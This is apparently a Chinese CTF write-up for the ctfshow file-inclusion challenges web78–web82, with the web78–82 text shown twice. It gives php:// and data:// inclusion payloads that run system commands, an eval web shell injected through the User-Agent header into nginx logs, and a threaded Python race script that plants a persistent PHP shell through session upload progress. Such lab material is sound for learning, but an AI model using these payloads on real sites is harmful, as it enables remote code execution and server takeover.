![\"image-20220915012654210\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126221.png\")
<\/div><\/p>\nweb78<\/h1>\n\u6b64\u9898\u4e3a \u3010\u4ece0\u5f00\u59cb\u5b66web\u3011\u7cfb\u5217\u7b2c\u4e03\u5341\u516b\u9898\n\u6b64\u7cfb\u5217\u9898\u76ee\u4ece\u6700\u57fa\u7840\u5f00\u59cb\uff0c\u9898\u76ee\u9075\u5faa\u5faa\u5e8f\u6e10\u8fdb\u7684\u539f\u5219\n\u5e0c\u671b\u5bf9\u5b66\u4e60CTF WEB\u7684\u540c\u5b66\u6709\u6240\u5e2e\u52a9\u3002\n\u6587\u4ef6\u5305\u542b\u7cfb\u5217\u5f00\u59cb<\/code><\/pre>\n<?php\nif(isset($_GET['file'])){\n $file = $_GET['file'];\n include($file);\n}else{\n highlight_file(__FILE__);\n}<\/code><\/pre>\n\u6ca1\u6709\u4efb\u4f55\u8fc7\u6ee4\uff0c\u76f4\u63a5\u4f7f\u7528\u4f2a\u534f\u8bae\u8bfb\u53d6\u5373\u53ef\uff1a(Hackbar\u7684LFI\u91cc\u6709\u96c6\u6210\u597d\u7684\u6a21\u5757\uff0c\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528)<\/code><\/p>\n\/?file=php:\/\/filter\/convert.base64-encode\/resource=flag.php<\/code><\/pre>\nPD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMDo1NToxMQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTA6NTU6MjANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3sxYTNlZTEwOS1iOGNiLTQ3ZjYtYTdjMi1hNjI2NmI4MmY4MGN9Ijs=\n-------------------------------------------------------------\n<?php\n\n\/*\n# -*- coding: utf-8 -*-\n# @Author: h1xa\n# @Date: 2020-09-16 10:55:11\n# @Last Modified by: h1xa\n# @Last Modified time: 2020-09-16 10:55:20\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n\n*\/\n\n$flag="ctfshow{1a3ee109-b8cb-47f6-a7c2-a6266b82f80c}";<\/code><\/pre>\n\u5f97\u5230flag\uff01\uff01\uff01<\/p>\n
Hint<\/h2>\n?file=php:\/\/filter\/convert.base64-encode\/resource=flag.php<\/code><\/pre>\nweb79<\/h1>\n<?php\nif(isset($_GET['file'])){\n $file = $_GET['file'];\n $file = str_replace("php", "???", $file);\n include($file);\n}else{\n highlight_file(__FILE__);\n}<\/code><\/pre>\n\u5bf9php<\/code>\u8fdb\u884c\u4e86\u8fc7\u6ee4\u3002<\/p>\n\u89e3\u6cd5\u4e00\uff1abase\u7f16\u7801\u7ed5\u8fc7<\/h2>\n
\u4f7f\u7528base64\u7f16\u7801\u8fdb\u884c\u7ed5\u8fc7\u3002\u3002<\/p>\n
?file=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs\/Pg==<\/code><\/pre>\n\u67e5\u770b\u6e90\u4ee3\u7801\u5f97\u5230flag\uff01\uff01\uff01<\/p>\n
\u89e3\u6cd5\u4e8c\uff1adata\u534f\u8bae+\u6b63\u5219\u5339\u914d\u66ff\u6362<\/h2>\nfile=data:\/\/text\/plain,<?=system('tac fl*');?><\/code><\/pre>\n\u89e3\u6cd5\u4e09\uff1a\u4f20shell<\/h2>\nfile=data:\/\/text\/plain,<?=eval($_POST[1]);?>\nPOST 1=phpinfo();<\/code><\/pre>\nHint<\/h2>\n?file=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=\nPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');<\/code><\/pre>\nweb80<\/h1>\n<?php\nif(isset($_GET['file'])){\n $file = $_GET['file'];\n $file = str_replace("php", "???", $file);\n $file = str_replace("data", "???", $file);\n include($file);\n}else{\n highlight_file(__FILE__);\n}<\/code><\/pre>\n\u8fc7\u6ee4\u4e86php<\/code>,data<\/code>\uff0c\u60f3\u7740\u5305\u542b\u7cfb\u7edf\u5df2\u7ecf\u6709\u7684\u6587\u4ef6\uff0c\u4f8b\u5982 linux \u4e0b\u7684var\/log\/nginx\/access.log<\/code>\u65e5\u5fd7\u6587\u4ef6\uff0c\u65e5\u5fd7\u5305\u542b\u3002<\/p>\n\u65e5\u5fd7\u5305\u542b<\/h2>\n\u6587\u4ef6\u5934\u4f20\u5165eval<\/h3>\nuser-agent: <?php @eval($_POST['a']); ?><\/code><\/pre>\n\u5305\u542b\u65e5\u5fd7\u6587\u4ef6<\/h3>\n\/?file=\/var\/log\/nginx\/access.log<\/code><\/pre>\nPOST\u53d1\u9001\u547d\u4ee4<\/h3>\na=system('ls');<\/code><\/pre>\n![\"image-20220914154052886\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u627e\u5230\u6587\u4ef6\u540d\uff0c\u76f4\u63a5cat<\/code>\u5373\u53ef:<\/del>\u76f4\u63a5tac<\/code>\u5373\u53ef\uff01<\/p>\na=system('tac fl0g.php');<\/code><\/pre>\n\u5f97\u5230 flag\uff01\uff01\uff01<\/p>\n
Hint<\/h2>\n\u5305\u542b\u65e5\u5fd7\u6587\u4ef6 \u8fdb\u884cgetshell \u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\uff1a ?file=\/var\/log\/nginx\/access.log<\/code><\/pre>\nweb81<\/h1>\n\u505a\u5b8c\u8fd9\u9053\u9898\uff0c\u4f60\u5c31\u5df2\u7ecf\u7ecf\u5386\u7684\u4e5d\u4e5d\u516b\u5341\u4e00\u96be\uff0c\u662f\u4e0d\u662f\u611f\u89c9\u5f88\u5feb\uff1f\n\u6ca1\u5173\u7cfb\uff0c\u540e\u9762\u8fd8\u662f\u4e5d\u767e\u4e00\u5341\u4e5d\u96be\uff0c\u52a0\u6cb9\u5427\uff0c\u5c11\u5e74\uff01<\/code><\/pre>\n<?php\nif(isset($_GET['file'])){\n $file = $_GET['file'];\n $file = str_replace("php", "???", $file);\n $file = str_replace("data", "???", $file);\n $file = str_replace(":", "???", $file);\n include($file);\n}else{\n highlight_file(__FILE__);\n}<\/code><\/pre>\n\u8bd5\u8bd5\u4e0a\u4e00\u9898\u7684\u601d\u8def\u770b\u770b\u53ef\u4ee5\u4e0d\u3002\u3002\u3002\u3002\u3002\u662f\u53ef\u4ee5\u7684\uff01<\/p>\n
Hint<\/h2>\n\u5305\u542b\u65e5\u5fd7\u6587\u4ef6 \u8fdb\u884cgetshell \u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\uff1a ?file=\/var\/log\/nginx\/access.log<\/code><\/pre>\nweb82<\/h1>\n
\u7ade\u4e89\u73af\u5883\u9700\u8981\u665a\u4e0a11\u70b930\u5206\u81f3\u6b21\u65e57\u65f630\u5206\u4e4b\u95f4\u505a\uff0c\u5176\u4ed6\u65f6\u95f4\u4e0d\u5f00\u653e\u7ade\u4e89\u6761\u4ef6<\/strong><\/p>\n<?php\nif(isset($_GET['file'])){\n $file = $_GET['file'];\n $file = str_replace("php", "???", $file);\n $file = str_replace("data", "???", $file);\n $file = str_replace(":", "???", $file);\n $file = str_replace(".", "???", $file);\n include($file);\n}else{\n highlight_file(__FILE__);\n}<\/code><\/pre>\n\u4e4b\u524d\u542c\u8bf4\u5927\u5e08\u5085\u628a\u7f51\u7ad9\u4fee\u4e86\u4ee5\u540e\u767d\u5929\u53ef\u4ee5\u505a\u4e86\u4e0d\u77e5\u9053\u5bf9\u4e0d\u5bf9\uff0c\u8bd5\u8bd5\uff01<\/p>\n
\n\u5728cookie\u5904\u6dfb\u52a0PHPSESSID\uff0c\u8fd9\u6837\u63d0\u4ea4\u7684\u8bdd\u4f1a\u5728\u9ed8\u8ba4session\u76ee\u5f55\u4e0b\u751f\u6210\u7c7b\u4f3c\u4e8esess_aaa\u7684\u6587\u4ef6\uff0c\u9ed8\u8ba4\u4e34\u65f6\u76ee\u5f55\u4e3a\/tmp\/sess_aaa\uff0c\u8fd9\u4e2a\u6587\u4ef6\u540d\u5b57\u662f\u6211\u4eec\u53ef\u4ee5\u63a7\u5236\u7684<\/p>\n
\u63a7\u5236\u91cc\u9762\u7684\u5185\u5bb9\u9700\u8981PHP_SESSION_UPLOAD_PRGRESS\u53c2\u6570\uff0c\u662f\u7528\u6765\u83b7\u53d6\u5b9e\u65f6\u6587\u4ef6\u7684\u4e0a\u4f20\u8fdb\u5ea6\uff0c\u5b83\u4f1a\u8fd4\u56de\u4e00\u4e2asession\uff0c\u7528\u6765\u5b9e\u73b0\u5199\u5165\u7684\u5185\u5bb9<\/p>\n<\/blockquote>\n
\u5927\u5e08\u5085\u6761\u4ef6\u7ade\u4e89\u811a\u672c\u89e3\u51b3<\/h2>\n
\u8fd9\u91cc\u76f4\u63a5\u767d\u5ad6\u4e00\u4e0b\u5927\u5e08\u5085\u7684\u811a\u672c\u5427\uff01
<\/div><\/p>\nimport requests\nimport io\nimport threading\n\nurl='http:\/\/4fb4c5f8-0655-4199-bb83-7c33b2c70259.challenge.ctf.show\/'\nsessionid="ctfshow"\ndata={\n "i":"file_put_contents('\/var\/www\/html\/1.php','<?php eval($_POST[1]);?>');"\n\n}\ndef write(session):\n fileBytes = io.BytesIO(b'a'*1024*50)\n while True:\n response=session.post(url,\n data={\n 'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'\n },\n cookies={\n 'PHPSESSID':sessionid\n },\n files={\n 'file':('ctfshow.jpg',fileBytes)\n }\n )\n # print(response.text)\n\ndef read(session):\n while True:\n response=session.post(url+'?file=\/tmp\/sess_'+sessionid,data=data,\n cookies={\n 'PHPSESSID':sessionid\n }\n )\n response2=session.get(url+'1.php');\n if response2.status_code==200:\n print('+++++++++++++++done+++++++++++++++')\n else:\n print(response2.status_code)\nif __name__ == '__main__':\n event=threading.Event() #\u5f00\u542f\u591a\u7ebf\u7a0b\n with requests.session() as session:\n # read(session)\n for i in range(5):\n threading.Thread(target=write,args=(session,)).start()\n for i in range(5):\n threading.Thread(target=read,args=(session,)).start()\n\n event.set() #\u521d\u59cb\u5316<\/code><\/pre>\n\u8dd1\u4e0d\u901a\u3002\u3002\u3002\u4e00\u76f4\u662f503<\/code>,404<\/code>\u4e4b\u7c7b\u7684\u3002\u3002\u3002\u3002\u3002<\/p>\n\u95ee\u8fc7\u7fa4\u91cc\u7684\u5e08\u5085\u4e86\uff0c\u5e08\u5085\u4eec\u731c\u6d4b\u662f\u5e73\u53f0\u7684\u95ee\u9898\uff0c\u9650\u5236\u901f\u5ea6\uff0c\u592a\u6162\u53c8\u5305\u542b\u4e0d\u4e86\uff0c\u96be\u8fc7\u3002\u3002\u3002\u3002<\/p>\n
bp\u6761\u4ef6\u7ade\u4e89<\/h2>\n\u5148\u6784\u9020\u4e00\u4e2aPOST<\/code>\u5305:<\/h3>\n<!doctype html>\n<html lang="en">\n<head>\n <meta charset="UTF-8">\n <meta name="viewport"\n content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">\n <meta http-equiv="X-UA-Compatible" content="ie=edge">\n <title>bp\u6761\u4ef6\u7ade\u4e89<\/title>\n<\/head>\n<body>\n<form action="http:\/\/2365b724-7bcd-4f24-bdec-7734babaa0c9.challenge.ctf.show\/" method="post"\n enctype="multipart\/form-data">\n <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="abc"\/>\n <input type="file" name="fileupload"\/>\n <input type="submit" name="submit" value="\u4e0a\u4f20\u6587\u4ef6"\/>\n<\/form>\n<\/body>\n<\/html><\/code><\/pre>\n\u4e0a\u4f20\u6587\u4ef6\uff0c\u4fee\u6539\u5305<\/h3>\n
\u968f\u4fbf\u4e0a\u4f20\u4e00\u4e2a\u6587\u4ef6\uff0c\u518d\u52a0\u4e00\u4e2aCookie<\/code>\u4e0a\u53bb\uff0c\u5e76\u5728PHP_SESSION_UPLOAD_PROGRESS<\/code>\u6dfb\u52a0\u547d\u4ee4\u8bed\u53e5\uff01<\/p>\nPOST \/ HTTP\/1.1\nHost: 2365b724-7bcd-4f24-bdec-7734babaa0c9.challenge.ctf.show\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\/20100101 Firefox\/104.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: multipart\/form-data; boundary=---------------------------1089288147727247033254480883\nContent-Length: 489\nOrigin: http:\/\/localhost:63342\nConnection: close\nReferer: http:\/\/localhost:63342\/\nUpgrade-Insecure-Requests: 1\nCookie:PHPSESSID=flag\n\n-----------------------------1089288147727247033254480883\nContent-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"\n\n\u00a7abc\u00a7<?php system('ls');?>\n-----------------------------1089288147727247033254480883\nContent-Disposition: form-data; name="fileupload"; filename="a.php"\nContent-Type: application\/octet-stream\n\n-----------------------------1089288147727247033254480883\nContent-Disposition: form-data; name="submit"\n\n-----------------------------1089288147727247033254480883--<\/code><\/pre>\n\u8bbf\u95ee?file=\/tmp\/sess_flag\uff0c\u4fee\u6539\u5305<\/h3>\n
\u6211\u6ca1\u8dd1\u51fa\u6765\uff0c\u79bb\u5927\u6d66\u4e86\uff0c\u8fd8\u662f\u7b49\u534a\u4e2a\u5c0f\u65f6\u4ee5\u540e\u523011\uff1a30\u518d\u8bd5\u8bd5\u811a\u672c\u5427\u3002\u3002\u3002\u3002\u3002<\/p>\n
payloads\u914d\u7f6e<\/h3>\n
\u6b64\u9898\u4e3a \u3010\u4ece0\u5f00\u59cb\u5b66web\u3011\u7cfb\u5217\u7b2c\u4e03\u5341\u516b\u9898\n\u6b64\u7cfb\u5217\u9898\u76ee\u4ece\u6700\u57fa\u7840\u5f00\u59cb\uff0c\u9898\u76ee\u9075\u5faa\u5faa\u5e8f\u6e10\u8fdb\u7684\u539f\u5219\n\u5e0c\u671b\u5bf9\u5b66\u4e60CTF WEB\u7684\u540c\u5b66\u6709\u6240\u5e2e\u52a9\u3002\n\u6587\u4ef6\u5305\u542b\u7cfb\u5217\u5f00\u59cb<\/code><\/pre>\n<?php\nif(isset($_GET['file'])){\n $file = $_GET['file'];\n include($file);\n}else{\n highlight_file(__FILE__);\n}<\/code><\/pre>\n\u6ca1\u6709\u4efb\u4f55\u8fc7\u6ee4\uff0c\u76f4\u63a5\u4f7f\u7528\u4f2a\u534f\u8bae\u8bfb\u53d6\u5373\u53ef\uff1a(Hackbar\u7684LFI\u91cc\u6709\u96c6\u6210\u597d\u7684\u6a21\u5757\uff0c\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528)<\/code><\/p>\n\/?file=php:\/\/filter\/convert.base64-encode\/resource=flag.php<\/code><\/pre>\nPD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMDo1NToxMQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTA6NTU6MjANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3sxYTNlZTEwOS1iOGNiLTQ3ZjYtYTdjMi1hNjI2NmI4MmY4MGN9Ijs=\n-------------------------------------------------------------\n<?php\n\n\/*\n# -*- coding: utf-8 -*-\n# @Author: h1xa\n# @Date: 2020-09-16 10:55:11\n# @Last Modified by: h1xa\n# @Last Modified time: 2020-09-16 10:55:20\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n\n*\/\n\n$flag="ctfshow{1a3ee109-b8cb-47f6-a7c2-a6266b82f80c}";<\/code><\/pre>\n\u5f97\u5230flag\uff01\uff01\uff01<\/p>\n
Hint<\/h2>\n?file=php:\/\/filter\/convert.base64-encode\/resource=flag.php<\/code><\/pre>\nweb79<\/h1>\n<?php\nif(isset($_GET['file'])){\n $file = $_GET['file'];\n $file = str_replace("php", "???", $file);\n include($file);\n}else{\n highlight_file(__FILE__);\n}<\/code><\/pre>\n\u5bf9php<\/code>\u8fdb\u884c\u4e86\u8fc7\u6ee4\u3002<\/p>\n\u89e3\u6cd5\u4e00\uff1abase\u7f16\u7801\u7ed5\u8fc7<\/h2>\n
\u4f7f\u7528base64\u7f16\u7801\u8fdb\u884c\u7ed5\u8fc7\u3002\u3002<\/p>\n
?file=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs\/Pg==<\/code><\/pre>\n\u67e5\u770b\u6e90\u4ee3\u7801\u5f97\u5230flag\uff01\uff01\uff01<\/p>\n
\u89e3\u6cd5\u4e8c\uff1adata\u534f\u8bae+\u6b63\u5219\u5339\u914d\u66ff\u6362<\/h2>\nfile=data:\/\/text\/plain,<?=system('tac fl*');?><\/code><\/pre>\n\u89e3\u6cd5\u4e09\uff1a\u4f20shell<\/h2>\nfile=data:\/\/text\/plain,<?=eval($_POST[1]);?>\nPOST 1=phpinfo();<\/code><\/pre>\nHint<\/h2>\n?file=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=\nPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');<\/code><\/pre>\nweb80<\/h1>\n<?php\nif(isset($_GET['file'])){\n $file = $_GET['file'];\n $file = str_replace("php", "???", $file);\n $file = str_replace("data", "???", $file);\n include($file);\n}else{\n highlight_file(__FILE__);\n}<\/code><\/pre>\n\u8fc7\u6ee4\u4e86php<\/code>,data<\/code>\uff0c\u60f3\u7740\u5305\u542b\u7cfb\u7edf\u5df2\u7ecf\u6709\u7684\u6587\u4ef6\uff0c\u4f8b\u5982 linux \u4e0b\u7684var\/log\/nginx\/access.log<\/code>\u65e5\u5fd7\u6587\u4ef6\uff0c\u65e5\u5fd7\u5305\u542b\u3002<\/p>\n\u65e5\u5fd7\u5305\u542b<\/h2>\n\u6587\u4ef6\u5934\u4f20\u5165eval<\/h3>\nuser-agent: <?php @eval($_POST['a']); ?><\/code><\/pre>\n\u5305\u542b\u65e5\u5fd7\u6587\u4ef6<\/h3>\n\/?file=\/var\/log\/nginx\/access.log<\/code><\/pre>\nPOST\u53d1\u9001\u547d\u4ee4<\/h3>\na=system('ls');<\/code><\/pre>\n<\/div><\/p>\n\u627e\u5230\u6587\u4ef6\u540d\uff0c\u76f4\u63a5cat<\/code>\u5373\u53ef:<\/del>\u76f4\u63a5tac<\/code>\u5373\u53ef\uff01<\/p>\na=system('tac fl0g.php');<\/code><\/pre>\n\u5f97\u5230 flag\uff01\uff01\uff01<\/p>\n
Hint<\/h2>\n\u5305\u542b\u65e5\u5fd7\u6587\u4ef6 \u8fdb\u884cgetshell \u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\uff1a ?file=\/var\/log\/nginx\/access.log<\/code><\/pre>\nweb81<\/h1>\n\u505a\u5b8c\u8fd9\u9053\u9898\uff0c\u4f60\u5c31\u5df2\u7ecf\u7ecf\u5386\u7684\u4e5d\u4e5d\u516b\u5341\u4e00\u96be\uff0c\u662f\u4e0d\u662f\u611f\u89c9\u5f88\u5feb\uff1f\n\u6ca1\u5173\u7cfb\uff0c\u540e\u9762\u8fd8\u662f\u4e5d\u767e\u4e00\u5341\u4e5d\u96be\uff0c\u52a0\u6cb9\u5427\uff0c\u5c11\u5e74\uff01<\/code><\/pre>\n<?php\nif(isset($_GET['file'])){\n $file = $_GET['file'];\n $file = str_replace("php", "???", $file);\n $file = str_replace("data", "???", $file);\n $file = str_replace(":", "???", $file);\n include($file);\n}else{\n highlight_file(__FILE__);\n}<\/code><\/pre>\n\u8bd5\u8bd5\u4e0a\u4e00\u9898\u7684\u601d\u8def\u770b\u770b\u53ef\u4ee5\u4e0d\u3002\u3002\u3002\u3002\u3002\u662f\u53ef\u4ee5\u7684\uff01<\/p>\n
Hint<\/h2>\n\u5305\u542b\u65e5\u5fd7\u6587\u4ef6 \u8fdb\u884cgetshell \u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\uff1a ?file=\/var\/log\/nginx\/access.log<\/code><\/pre>\nweb82<\/h1>\n
\u7ade\u4e89\u73af\u5883\u9700\u8981\u665a\u4e0a11\u70b930\u5206\u81f3\u6b21\u65e57\u65f630\u5206\u4e4b\u95f4\u505a\uff0c\u5176\u4ed6\u65f6\u95f4\u4e0d\u5f00\u653e\u7ade\u4e89\u6761\u4ef6<\/strong><\/p>\n<?php\nif(isset($_GET['file'])){\n $file = $_GET['file'];\n $file = str_replace("php", "???", $file);\n $file = str_replace("data", "???", $file);\n $file = str_replace(":", "???", $file);\n $file = str_replace(".", "???", $file);\n include($file);\n}else{\n highlight_file(__FILE__);\n}<\/code><\/pre>\n\u4e4b\u524d\u542c\u8bf4\u5927\u5e08\u5085\u628a\u7f51\u7ad9\u4fee\u4e86\u4ee5\u540e\u767d\u5929\u53ef\u4ee5\u505a\u4e86\u4e0d\u77e5\u9053\u5bf9\u4e0d\u5bf9\uff0c\u8bd5\u8bd5\uff01<\/p>\n
\n\u5728cookie\u5904\u6dfb\u52a0PHPSESSID\uff0c\u8fd9\u6837\u63d0\u4ea4\u7684\u8bdd\u4f1a\u5728\u9ed8\u8ba4session\u76ee\u5f55\u4e0b\u751f\u6210\u7c7b\u4f3c\u4e8esess_aaa\u7684\u6587\u4ef6\uff0c\u9ed8\u8ba4\u4e34\u65f6\u76ee\u5f55\u4e3a\/tmp\/sess_aaa\uff0c\u8fd9\u4e2a\u6587\u4ef6\u540d\u5b57\u662f\u6211\u4eec\u53ef\u4ee5\u63a7\u5236\u7684<\/p>\n
\u63a7\u5236\u91cc\u9762\u7684\u5185\u5bb9\u9700\u8981PHP_SESSION_UPLOAD_PRGRESS\u53c2\u6570\uff0c\u662f\u7528\u6765\u83b7\u53d6\u5b9e\u65f6\u6587\u4ef6\u7684\u4e0a\u4f20\u8fdb\u5ea6\uff0c\u5b83\u4f1a\u8fd4\u56de\u4e00\u4e2asession\uff0c\u7528\u6765\u5b9e\u73b0\u5199\u5165\u7684\u5185\u5bb9<\/p>\n<\/blockquote>\n
\u5927\u5e08\u5085\u6761\u4ef6\u7ade\u4e89\u811a\u672c\u89e3\u51b3<\/h2>\n
\u8fd9\u91cc\u76f4\u63a5\u767d\u5ad6\u4e00\u4e0b\u5927\u5e08\u5085\u7684\u811a\u672c\u5427\uff01
<\/div><\/p>\nimport requests\nimport io\nimport threading\n\nurl='http:\/\/4fb4c5f8-0655-4199-bb83-7c33b2c70259.challenge.ctf.show\/'\nsessionid="ctfshow"\ndata={\n "i":"file_put_contents('\/var\/www\/html\/1.php','<?php eval($_POST[1]);?>');"\n\n}\ndef write(session):\n fileBytes = io.BytesIO(b'a'*1024*50)\n while True:\n response=session.post(url,\n data={\n 'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'\n },\n cookies={\n 'PHPSESSID':sessionid\n },\n files={\n 'file':('ctfshow.jpg',fileBytes)\n }\n )\n # print(response.text)\n\ndef read(session):\n while True:\n response=session.post(url+'?file=\/tmp\/sess_'+sessionid,data=data,\n cookies={\n 'PHPSESSID':sessionid\n }\n )\n response2=session.get(url+'1.php');\n if response2.status_code==200:\n print('+++++++++++++++done+++++++++++++++')\n else:\n print(response2.status_code)\nif __name__ == '__main__':\n event=threading.Event() #\u5f00\u542f\u591a\u7ebf\u7a0b\n with requests.session() as session:\n # read(session)\n for i in range(5):\n threading.Thread(target=write,args=(session,)).start()\n for i in range(5):\n threading.Thread(target=read,args=(session,)).start()\n\n event.set() #\u521d\u59cb\u5316<\/code><\/pre>\n\u8dd1\u4e0d\u901a\u3002\u3002\u3002\u4e00\u76f4\u662f503<\/code>,404<\/code>\u4e4b\u7c7b\u7684\u3002\u3002\u3002\u3002\u3002<\/p>\n\u95ee\u8fc7\u7fa4\u91cc\u7684\u5e08\u5085\u4e86\uff0c\u5e08\u5085\u4eec\u731c\u6d4b\u662f\u5e73\u53f0\u7684\u95ee\u9898\uff0c\u9650\u5236\u901f\u5ea6\uff0c\u592a\u6162\u53c8\u5305\u542b\u4e0d\u4e86\uff0c\u96be\u8fc7\u3002\u3002\u3002\u3002<\/p>\n
bp\u6761\u4ef6\u7ade\u4e89<\/h2>\n\u5148\u6784\u9020\u4e00\u4e2aPOST<\/code>\u5305:<\/h3>\n<!doctype html>\n<html lang="en">\n<head>\n <meta charset="UTF-8">\n <meta name="viewport"\n content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">\n <meta http-equiv="X-UA-Compatible" content="ie=edge">\n <title>bp\u6761\u4ef6\u7ade\u4e89<\/title>\n<\/head>\n<body>\n<form action="http:\/\/2365b724-7bcd-4f24-bdec-7734babaa0c9.challenge.ctf.show\/" method="post"\n enctype="multipart\/form-data">\n <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="abc"\/>\n <input type="file" name="fileupload"\/>\n <input type="submit" name="submit" value="\u4e0a\u4f20\u6587\u4ef6"\/>\n<\/form>\n<\/body>\n<\/html><\/code><\/pre>\n\u4e0a\u4f20\u6587\u4ef6\uff0c\u4fee\u6539\u5305<\/h3>\n
\u968f\u4fbf\u4e0a\u4f20\u4e00\u4e2a\u6587\u4ef6\uff0c\u518d\u52a0\u4e00\u4e2aCookie<\/code>\u4e0a\u53bb\uff0c\u5e76\u5728PHP_SESSION_UPLOAD_PROGRESS<\/code>\u6dfb\u52a0\u547d\u4ee4\u8bed\u53e5\uff01<\/p>\nPOST \/ HTTP\/1.1\nHost: 2365b724-7bcd-4f24-bdec-7734babaa0c9.challenge.ctf.show\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\/20100101 Firefox\/104.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: multipart\/form-data; boundary=---------------------------1089288147727247033254480883\nContent-Length: 489\nOrigin: http:\/\/localhost:63342\nConnection: close\nReferer: http:\/\/localhost:63342\/\nUpgrade-Insecure-Requests: 1\nCookie:PHPSESSID=flag\n\n-----------------------------1089288147727247033254480883\nContent-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"\n\n\u00a7abc\u00a7<?php system('ls');?>\n-----------------------------1089288147727247033254480883\nContent-Disposition: form-data; name="fileupload"; filename="a.php"\nContent-Type: application\/octet-stream\n\n-----------------------------1089288147727247033254480883\nContent-Disposition: form-data; name="submit"\n\n-----------------------------1089288147727247033254480883--<\/code><\/pre>\n\u8bbf\u95ee?file=\/tmp\/sess_flag\uff0c\u4fee\u6539\u5305<\/h3>\n
\u6211\u6ca1\u8dd1\u51fa\u6765\uff0c\u79bb\u5927\u6d66\u4e86\uff0c\u8fd8\u662f\u7b49\u534a\u4e2a\u5c0f\u65f6\u4ee5\u540e\u523011\uff1a30\u518d\u8bd5\u8bd5\u811a\u672c\u5427\u3002\u3002\u3002\u3002\u3002<\/p>\n
payloads\u914d\u7f6e<\/h3>\n
![\"image-20220914154052886\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126631.png\")
<\/div><\/p>\n![\"\u8d22\u8ff7\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126633.svg\")
<\/div><\/p>\n![\"image-20220914225550738\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126634.png\")
<\/div><\/p>\n![\"image-20220914204712340\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126635.png\")
<\/div><\/p>\n![\"image-20220914213230386\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126636.png\")
<\/div><\/p>\n![\"00080067\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209142133626.png\")
<\/div>\n<\/div>\n![\"image-20220914221426673\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126638.png\")
<\/div><\/p>\n